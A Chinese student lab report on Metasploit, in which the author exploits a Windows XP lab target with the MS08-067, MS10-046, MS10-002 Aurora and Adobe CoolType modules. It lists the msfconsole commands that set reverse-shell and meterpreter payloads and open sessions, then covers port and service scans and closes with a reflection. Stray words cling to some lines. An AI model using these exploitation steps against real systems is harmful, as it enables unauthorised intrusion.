本实践目标是掌握metasploit的基本应用方式,重点经常使用的三种攻击方式的思路。具体须要完成:shell
输入 “msfconsole” 及“search ms08_067”进行漏洞搜索windows
输入“use exploit/windows/smb/ms08_067_netapi”及“show payloads”显示可调用的攻击载荷api
输入“set payload generic/shell_reverse_tcp”设置攻击载荷,tcp反弹链接浏览器
“set LHOST 192.168.198.145”及“set LPORT 4313”设置回连ip及端口session
“set RHOST 192.168.198.147"设置
靶机winxp iptcp
“set target 0”自动选择目标系统类型,匹配度较高学习
“show options”查看设置是否正确网站
最后输入“exploit”开启监听编码
监听失败是由于靶机防火墙没关url
监听成功
基本步骤同上,不过是使用“use exploit/windows/browser/ms10_046_shortcut_icon_dllloader”模块
发现SRVHOST没填,输入“set SRVHOST 192.168.198.145”
输入“exploit”,能够看到生成一个url
在靶机的浏览器中访问该url
输入“sessions”命令查看当前活动连接
输入“sessions -i 1”接入ID为1的活动连接,获取靶机shell
ms10_002台风漏洞是IE浏览器漏洞,也是黑客挂马利用的最热门漏洞
输入“use windows/browser/ms10_002_aurora”调用模块
“set payload windows/meterpreter/reverse_http”设置http反向回连
而后设置攻击机ip和攻击端口
“set URIPATH 4313dgx”设置统一资源标识符路径
生成url
攻击机回连成功
选择“use exploit/windows/browser/adobe_cooltype_sing”模块
“set payload windows/meterpreter/reverse_tcp”设置tcp反向链接
设置攻击机ip和端口
“set FILENAME 20164313.pdf”设置攻击文件名称
因为我用的是 browser 下的攻击模块,因此它会生成一个 url 连接,点开会自动下载一个空白的 pdf 文件。
攻击成功
输入“sessions”查看当前会话
“sessions -i 1”及“shell” 选择第一个会话,获取靶机shell
输入“use auxiliary/scanner/portscan/tcp” 扫描目标主机上TCP使用的端口号
“set RHOST 192.168.198.147”设置靶机ip
输入“scanner/smb/smb_version”查看靶机的smb版本
“set RHOST 192.168.198.147”设置靶机ip
输入“use auxiliary/scanner/discovery/udp_sweep” 检测目标主机上经常使用的udp服务
“set RHOSTS 192.168.198.147”设置靶机ip
答: exploit:渗透攻击,利用发现的漏洞对靶机进行攻击。
payload:攻击载荷,渗透攻击成功后在系统中运行的模块,即经过渗透攻击把攻击载荷运至靶机中。
Ecode:编码器,对代码进行异或、祛除坏字符及其余编码,保护攻击载荷不被发现。
答:咱们学会了初步的渗透、免杀、攻击,但在实战中如何让靶机运行咱们制做的病毒文件是咱们缺乏的,由于我不会傻傻的访问一个我不了解网站,而后下载一个对我没有意义的文件,更不用说运行那个文件了。
此次实验其实并不难,也让我对msf功能的强大有了进一步的认识,可是发现本身对msf的了解还不够,对于一些指令的理解也不透彻。另外,也认识到世界上没有完美的程序,总会存在各类各样的漏洞,可以被黑客利用,平时仍是须要更认真学习的。